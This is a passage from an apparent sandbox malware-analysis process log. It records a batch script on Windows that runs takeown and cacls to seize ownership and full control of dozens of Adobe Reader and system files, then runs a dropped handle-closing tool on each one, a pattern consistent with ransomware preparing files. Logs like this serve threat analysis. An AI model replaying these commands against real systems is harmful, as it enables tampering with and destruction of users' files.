    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    - Modifies file permissions
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:708
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    - Modifies file permissions
    PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1164
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:1236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1516
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    - Modifies file permissions
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1748
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:920
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    - Modifies file permissions
    PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1708
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
